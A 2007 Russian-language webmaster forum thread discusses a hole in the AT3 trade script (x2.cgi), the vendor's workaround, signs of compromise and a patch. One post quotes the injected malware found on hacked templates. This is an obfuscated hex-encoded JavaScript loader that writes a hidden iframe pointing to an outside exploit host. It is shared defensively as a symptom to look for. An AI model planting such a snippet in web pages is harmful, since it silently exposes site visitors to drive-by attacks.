С нами с 14.12.06
Сообщения: 174
Рейтинг: 93
|
 Добавлено: 07/12/07 в 20:56 |
[Virus] уже написал в хитботчиках, но может не все заметили:
Список хитботчиков 4
Сегодня в заголовке АТЛ (на входе в админку) появилась новость о
найденой дырке и рекомендация закрыть x2.cgi в htaccess-e от
доступа с других ИП.
Обещают выпустить апдейт в ближайшем времени.
Правда на сайте arrowscripts чето пока этой новости я не нашел.
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 07/12/07 в 22:05 |
|
|
|
|
| |
С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
| Добавлено: 07/12/07 в 22:55 |
блин ну че за криворукие программеры!
в атх трейд по групам 3 месяц делают, да еще и дыры постоянно появляются! 
продам 2 копии атх 
зы: не, пока не буду продавать..
|
|
|
|
| |
С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694
|
| Добавлено: 08/12/07 в 00:00 |
А симптоматика то какая? На что внимание обратить?
Последний раз редактировалось: Ziegfrid (08/12/07 в 00:20), всего редактировалось 1 раз
|
|
|
|
| |
пьяный мастер
С нами с 06.09.05
Сообщения: 11946
Рейтинг: 5837
|
| Добавлено: 08/12/07 в 00:13 |
| Цитата: | A security issue has been detected and fixed, new build is on its way.
In the mean time, use htaccess to limit access to the file
cgi-bin/at3/x/x2.cgi to only your IP and blacklist IPs 208.53.158.26 and 69.93.211.234 |
пи*дец, вот они зае*али... опять надо будет все скрипты обновлять 
|
|
|
|
| |
С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
| Добавлено: 08/12/07 в 00:16 |
ладно ат3, он фришный..
но пилять, атх, купить за 400баков и там трейд по групам не работает - это пипец..
зы: в атх тоже дыру нашли
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 08/12/07 в 01:03 |
| Ziegfrid писал: | | А симптоматика то какая? На что внимание обратить? |
Он троя весит такого
| Код: |
<script> var s='3C696672616D65207372633D22687474703A2F2F3230332 E3132312E36392E392F65782F7374617469632E70687022207 7696474683D32206865696768743D32207374796C653D22646 973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script> |
и еще создает файл backup.php пустой.
Я вчера эту гадость у себя находил.
p.s. думаю трейд скрипт надо другой ставить какой посоветуете АТС?
|
|
|
|
| |
С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694
|
| Добавлено: 08/12/07 в 01:18 |
| Kitaa писал: |
p.s. думаю трейд скрипт надо другой ставить какой посоветуете АТС? |
АТС смысла нет ставить. Скоро появится 1.7 версия. Щас активно тестируется. Вот поэтому пока ставлю ФТТ. Кстати пока скрипт показал себя с хорошей стороны (да и после ат3 очень легко с ним, потому как много похожего, хотя есть еще некоторые полезные вещи). Но все равно жду 1.7 АТС.
|
|
|
|
| |
С нами с 06.03.04
Сообщения: 5352
Рейтинг: 1678
|
| Добавлено: 08/12/07 в 01:35 |
нахрен снес ат3 со всех сиджев, недавно
|
|
|
|
| |
С нами с 22.01.04
Сообщения: 1037
Рейтинг: 694
|
| Добавлено: 08/12/07 в 01:36 |
| awm_mark писал: | | нахрен снес ат3 со всех сиджев, недавно |
Оффтопик: Что поставил?
|
|
|
|
| |
С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
| Добавлено: 08/12/07 в 01:41 |
хм.. backup.php пустой находил в корне домена, а вот троя нет вроде нигде. куда они его вешают? на морду или в топ?
может спасло то, что доступ к фтп закрыт у меня..
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 08/12/07 в 02:02 |
У меня по вешали на темплейт, на страничку для линк трейда и на фрихи которые были на данных сайтах. Судя по логам фтп к нему не прикосались.
p.s. права на темплейт какие стоят? может если 444 то это спасло.
|
|
|
|
| |
С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
| Добавлено: 08/12/07 в 02:09 |
может через SSH?
он уменя тоже закрыт.
|
|
|
|
| |
С нами с 06.03.04
Сообщения: 5352
Рейтинг: 1678
|
| Добавлено: 08/12/07 в 04:09 |
чаще всего вешается когда на вирте хост (ну или для дедика доступ к 1 фтп достаточно, межсайтовый скр пропускаю, не поймут тут)
просто некоторые скрипты требуют установки 777 на корень, при этом вы открываете доступ к своим страницам любому желающему
|
|
|
|
| |
www.phpdevs.com
С нами с 24.10.02
Сообщения: 16633
Рейтинг: 16105
|
| Добавлено: 08/12/07 в 12:59 |
насколько понимаю, эта дыра только если скрипт может писать в директорию вэб сайта.
|
|
|
|
Пишу на php/mysql/django за вменяемые деньги.
Обращаться в личку.
|
0
|
|
| |
размещу
С нами с 30.12.00
Сообщения: 4800
Рейтинг: 1304
|
| Добавлено: 08/12/07 в 17:01 |
мне в темллейт топлиста ат3 вешали
|
|
|
|
| |
С нами с 02.09.06
Сообщения: 598
Рейтинг: 613
|
| Добавлено: 08/12/07 в 18:45 |
Писать можно во все файлы/папки где это разрешено пользователю от которых выполняется cgi-bin.
|
|
|
|
| |
С нами с 06.07.04
Сообщения: 476
Рейтинг: 512
|
| Добавлено: 08/12/07 в 19:29 |
| awm_mark писал: | | нахрен снес ат3 со всех сиджев, недавно |
После того как увидел, что разработчик не залатав дыру в текущем стал делать очередную новогоднюю версию со скидками - думаю что тоже буду сносить.
|
|
|
|
| |
Мокшень кой
С нами с 19.08.04
Сообщения: 4273
Рейтинг: 274
|
| Добавлено: 08/12/07 в 20:13 |
16 билд уже готов. Идем качать
|
|
|
|
| |
С нами с 16.12.05
Сообщения: 1260
Рейтинг: 358
|
| Добавлено: 08/12/07 в 20:36 |
Какие файлы дистрибутива надо переписать поверх старых, чтобы не затереть базу трейдеров и топлистов, и втоже время все работало?
|
|
|
|
| |
Мокшень кой
С нами с 19.08.04
Сообщения: 4273
Рейтинг: 274
|
| Добавлено: 08/12/07 в 20:47 |
там патч скачай, и сверху его заливай, ниче не сотрется
|
|
|
|
| |
С нами с 05.11.05
Сообщения: 1563
Рейтинг: 1240
|
| Добавлено: 09/12/07 в 00:02 |
опасна ли дыра если формы закрыты?
|
|
|
|
| |
С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
| Добавлено: 09/12/07 в 00:07 |
когда появился backup.php в корне, все формы были закрыты.
поэтому палагаю, что опасно.
|
|
|
|
| |
nobody knows
С нами с 07.07.04
Сообщения: 1360
Рейтинг: 784
|
| Добавлено: 09/12/07 в 02:00 |
я хоть и не пострадал (у меня /x/ доступна только по http auth), но всё равно обиделся и пошёл купил 10 версий tradeexpert. во первых дешевле, во вторых надеюсь он менее распространён и будет меньше дыр находиться...
|
|
|
|
Nihil probat, qui nimium probat
|
0
|
|
| |
С нами с 07.06.06
Сообщения: 295
Рейтинг: 210
|
| Добавлено: 09/12/07 в 02:01 |
во а я тогда на смарт подумал, месяц 2 назад тоже ламанули, так вот бекап в корне был для отвода глаз, ищи еще один, скорее всего он будет в ротаторе в бекап папке или где то там
|
|
|
|
| |
